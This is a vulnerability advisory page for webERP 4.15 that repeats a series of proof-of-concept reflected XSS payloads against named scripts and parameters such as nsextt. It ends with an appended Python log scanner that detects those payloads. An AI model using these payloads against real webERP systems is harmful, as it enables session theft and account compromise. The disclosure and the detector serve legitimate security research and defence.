webERP 4.15 - nsextt Multiple XSS Injection - CXSecurity.com

Vulnerability ID 1570416 Vulnerability type
Published 2019-04-15 Updated 2019-04-15
CVE number N/A CNNVD-ID N/A
Vulnerability platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019040128
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability EXP
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004B53)%252b%2522
# GET Request : http://localhost/webERP/webERP/AgedDebtors.php?nsextt=%22%2balert(0x004B53)%2b%22 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x00490C)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustomerAllocations.php?nsextt=%22%2balert(0x00490C)%2b%22 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004F06)%252b%2522 
# GET Request : http://localhost/webERP/webERP/CustomerBalancesMovement.php?nsextt=%22%2balert(0x004F06)%2b%22 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : NewReceipt,nsextt,Type,nsparamname
# Attack Pattern : %27%2balert(0x0047E5)%2b%27 
# GET Request : http://localhost/webERP/webERP/CustomerReceipt.php?NewReceipt='+alert(0x0047E5)+'&Type=Customer  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x0049AA)%252b%2522 
# GET Request : http://localhost/webERP/webERP/CustWhereAlloc.php?nsextt=%22%2balert(0x0049AA)%2b%22  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : FormID,AddToMenu,ScriptName,Title
# Attack Pattern : %27%2balert(0x003279)%2b%27  
# POST Request : http://localhost/webERP/webERP/Dashboard.php  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004C8E)%252b%2522 
# GET Request : http://localhost/webERP/webERP/DebtorsAtPeriodEnd.php?nsextt=%22%2balert(0x004C8E)%2b%22  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004BF0)%252b%2522 
# GET Request : http://localhost/webERP/webERP/PDFBankingSummary.php?nsextt=%22%2balert(0x004BF0)%2b%22   
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt,NewCredit,nsparamname
# Attack Pattern : %27%2balert(0x003279)%2b%27  
# GET Request : http://localhost/webERP/webERP/SelectCreditItems.php?NewCredit=Yes&nsextt=%22%2balert(0x0046E2)%2b%22   
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt,StockCat,FormID,Keywords,SupplierStockCode,ScriptName,StockCode,AddToMenu,Search,Title
# Attack Pattern : %27%2balert(0x0035E4)%2b%27  
# GET Request : http://localhost/webERP/webERP/SelectProduct.php  
===========================================================================================
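Every GET case above has the same shape: a quote character that closes the string the parameter is reflected into, followed by a JavaScript call. The Python below is an added example, not part of this advisory or of webERP: it percent-decodes query values to the same depth as the "Attack Pattern" lines (which are encoded twice, %2522 -> %22 -> ") and flags that shape in constructed access-log lines; the watched parameter names are taken from the advisory, while the regexes, log lines and IPs are my own constructed heuristics and samples.

```python
"""Flag reflected-XSS probes against the webERP parameters named in this
advisory in combined-format access logs (added example; SAMPLE_LOG is
constructed). 'Attack Pattern' values are double-encoded (%2522 -> %22 -> "),
'GET Request' values single-encoded, so decoding repeats until stable."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory reports as reflected without output encoding.
WATCHED = {"nsextt", "nsparamname", "NewReceipt", "NewCredit", "Type",
           "FormID", "AddToMenu", "ScriptName", "Title", "StockCat",
           "Keywords", "SupplierStockCode", "StockCode", "Search"}
# A quote that closes the enclosing string, then a call: "+alert(0x...)+"
BREAKOUT = re.compile(r"""["'][^"']*\b\w+\s*\(""")
TAG_OR_HANDLER = re.compile(r"<\s*/?\s*script|\bon\w+\s*=", re.IGNORECASE)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP')
SAMPLE_LOG = [  # constructed lines; 192.0.2.0/24 is documentation space
    '192.0.2.10 - - [28/Feb/2019:10:15:02 +0000] "GET /webERP/AgedDebtors.php'
    '?nsextt=%22%2balert(0x004B53)%2b%22 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [28/Feb/2019:10:15:09 +0000] "GET /webERP/AgedDebtors.php'
    '?nsextt=Aged%20Debtors&FromDate=2019-02-28 HTTP/1.1" 200 5120',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding; stop when a round changes nothing."""
    for _ in range(max_rounds):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def suspicious_params(request_target):
    """Return [(param, decoded_value)] for watched params carrying a payload."""
    hits = []
    for name, raw in parse_qsl(urlsplit(request_target).query,
                               keep_blank_values=True):
        if name in WATCHED:
            val = fully_decode(raw)  # parse_qsl already did one round
            if BREAKOUT.search(val) or TAG_OR_HANDLER.search(val):
                hits.append((name, val))
    return hits

def scan_access_log(lines):
    """Return [(client_ip, path, hits)] per flagged line. POST bodies (the
    Dashboard.php and SelectProduct.php cases) never reach the access log."""
    found = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := suspicious_params(m.group(2))):
            found.append((m.group(1), urlsplit(m.group(2)).path, hits))
    return found
```

The POST-based cases need request-body logging or a WAF in front of webERP, since an access log only records the query string.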